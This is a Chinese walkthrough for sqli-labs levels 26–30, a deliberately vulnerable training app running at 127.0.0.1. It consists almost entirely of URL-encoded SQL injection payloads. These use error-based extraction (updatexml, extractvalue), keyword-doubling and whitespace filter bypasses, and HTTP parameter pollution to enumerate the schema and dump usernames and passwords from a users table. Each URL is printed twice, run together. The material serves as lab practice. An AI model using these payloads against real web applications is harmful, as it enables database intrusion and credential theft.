sqli-labsSQL手工注入第26-30关

第26关

一.查询数据库

http://127.0.0.1/Less-26/?id=11%27%26extractvalue(1,concat(%27~%27,database(),%27~%27))%261=%27

二.查表

http://127.0.0.1/Less-26/?id=1%27||(updatexml(1,concat(1,(select(group_concat(table_name))from(infoorrmation_schema.tables)where(table_schema=%27security%27))),1))||%27http://127.0.0.1/Less-26/?id=1%27||(updatexml(1,concat(1,(select(group_concat(table_name))from(infoorrmation_schema.tables)where(table_schema=%27security%27))),1))||%27

三.查列

http://127.0.0.1/Less-26/?id=1%27||(updatexml(1,concat(1,(select(group_concat(column_name))from(infoorrmation_schema.columns)where(table_schema=%27security%27aandnd(table_name=%27users%27)))),1))||%27http://127.0.0.1/Less-26/?id=1%27||(updatexml(1,concat(1,(select(group_concat(column_name))from(infoorrmation_schema.columns)where(table_schema=%27security%27aandnd(table_name=%27users%27)))),1))||%27

四.查user表里信息

http://127.0.0.1/Less-26/?id=1%27||(updatexml(1,concat(1,(select(group_concat(passwoorrd,username))from(users))),1))||%27http://127.0.0.1/Less-26/?id=1%27||(updatexml(1,concat(1,(select(group_concat(passwoorrd,username))from(users))),1))||%27

第27关

一.查询数据库

http://127.0.0.1/Less-27/?id=1%27and%09updatexml(1,concat(1,(sElect%09database())),1)and%27http://127.0.0.1/Less-27/?id=1%27and%09updatexml(1,concat(1,(sElect%09database())),1)and%27

二.查表

http://127.0.0.1/Less-27/?id=1%27and%09updatexml(1,concat(1,(sElect%09group_concat(table_name)%09from%09information_schema.tables%09where%09table_schema=%27security%27)),1)and%27http://127.0.0.1/Less-27/?id=1%27and%09updatexml(1,concat(1,(sElect%09group_concat(table_name)%09from%09information_schema.tables%09where%09table_schema=%27security%27)),1)and%27

三.查列

http://127.0.0.1/Less-27/?id=1%27and%09updatexml(1,concat(1,(sElect%09group_concat(column_name)%09from%09information_schema.columns%09where%09table_schema=%27security%27%09and%09table_name=%27users%27)),1)and%27http://127.0.0.1/Less-27/?id=1%27and%09updatexml(1,concat(1,(sElect%09group_concat(column_name)%09from%09information_schema.columns%09where%09table_schema=%27security%27%09and%09table_name=%27users%27)),1)and%27

四.查user表里信息

http://127.0.0.1/Less-27/?id=1%27and%09updatexml(1,concat(1,(sElect%09group_concat(username,password)%09from%09users)),1)and%27http://127.0.0.1/Less-27/?id=1%27and%09updatexml(1,concat(1,(sElect%09group_concat(username,password)%09from%09users)),1)and%27

第28关

一.查询数据库

http://127.0.0.1/Less-28/?id=88%27)uni%20union%0Aselecton%0Aselect%0A1,database(),2%0Aand%20(%271http://127.0.0.1/Less-28/?id=88%27)uni%20union%0Aselecton%0Aselect%0A1,database(),2%0Aand%20(%271

二.查表

http://127.0.0.1/Less-28/?id=88%27)uni%20union%0Aselecton%0Aselect%0A1,2,group_concat(column_name)from%0Ainformation_schema.columns%0Awhere%0Atable_schema=%27security%27%0Aand%0Atable_name=%27users%27%0Aand(%271http://127.0.0.1/Less-28/?id=88%27)uni%20union%0Aselecton%0Aselect%0A1,2,group_concat(column_name)from%0Ainformation_schema.columns%0Awhere%0Atable_schema=%27security%27%0Aand%0Atable_name=%27users%27%0Aand(%271

三.查列

http://127.0.0.1/Less-28/?id=88%27)uniunion%0Aselecton%0Aselect%0A1,2,group_concat(column_name)from%0Ainformation_schema.columns%0Awhere%0Atable_schema=%27security%27%0Aand%0Atable_name=%27users%27%0Aand(%271http://127.0.0.1/Less-28/?id=88%27)uniunion%0Aselecton%0Aselect%0A1,2,group_concat(column_name)from%0Ainformation_schema.columns%0Awhere%0Atable_schema=%27security%27%0Aand%0Atable_name=%27users%27%0Aand(%271

四.查询user表中信息

http://127.0.0.1/Less-28/?id=88%27)union%0Aunion%0Aselectselect%0A1,group_concat(username,password),3%0Afrom%0Ausers%0Awhere%0A1=1%0Aand(%271%27)=(%271http://127.0.0.1/Less-28/?id=88%27)union%0Aunion%0Aselectselect%0A1,group_concat(username,password),3%0Afrom%0Ausers%0Awhere%0A1=1%0Aand(%271%27)=(%271

第29关

一.查询数据库

http://127.0.0.1/Less-29/?id=1&id=-1%27union%20select%201,database(),3%20--+http://127.0.0.1/Less-29/?id=1&id=-1%27union%20select%201,database(),3%20--+

二.查表

http://127.0.0.1/Less-29/?id=-1%27union%20select%201,group_concat(table_name),3%20from%20information_schema.tables%20where%20table_schema=%27security%27%20--+http://127.0.0.1/Less-29/?id=-1%27union%20select%201,group_concat(table_name),3%20from%20information_schema.tables%20where%20table_schema=%27security%27%20--+

三.查列

http://127.0.0.1/Less-29/?id=1&id=-1%27union%20select%201,group_concat(column_name),3%20from%20information_schema.columns%20where%20table_schema=%27security%27%20and%20table_name=%27users%27%20--+http://127.0.0.1/Less-29/?id=1&id=-1%27union%20select%201,group_concat(column_name),3%20from%20information_schema.columns%20where%20table_schema=%27security%27%20and%20table_name=%27users%27%20--+

四.查user表中信息

http://127.0.0.1/Less-29/?id=1&id=-1%27union%20select%201,2,group_concat(id,username,password)%20from%20users%20--+http://127.0.0.1/Less-29/?id=1&id=-1%27union%20select%201,2,group_concat(id,username,password)%20from%20users%20--+

第30关

一.查询数据库

http://127.0.0.1/Less-30/?id=1&id=-1%22union%20select%201,database(),3%20--+http://127.0.0.1/Less-30/?id=1&id=-1%22union%20select%201,database(),3%20--+

二.查表

http://127.0.0.1/Less-30/?id=1&id=-1%22union%20select%201,group_concat(table_name),3%20from%20information_schema.tables%20where%20table_schema=%27security%27%20--+http://127.0.0.1/Less-30/?id=1&id=-1%22union%20select%201,group_concat(table_name),3%20from%20information_schema.tables%20where%20table_schema=%27security%27%20--+

三.查列

http://127.0.0.1/Less-30/?id=1&id=-1%22union%20select%201,group_concat(column_name),3%20from%20information_schema.columns%20where%20table_schema=%27security%27%20and%20table_name=%27users%27%20--+http://127.0.0.1/Less-30/?id=1&id=-1%22union%20select%201,group_concat(column_name),3%20from%20information_schema.columns%20where%20table_schema=%27security%27%20and%20table_name=%27users%27%20--+

四.查user表中信息

http://127.0.0.1/Less-30/?id=1&id=-1%22union%20select%201,2,group_concat(id,username,password)%20from%20users%20--+http://127.0.0.1/Less-30/?id=1&id=-1%22union%20select%201,2,group_concat(id,username,password)%20from%20users%20--+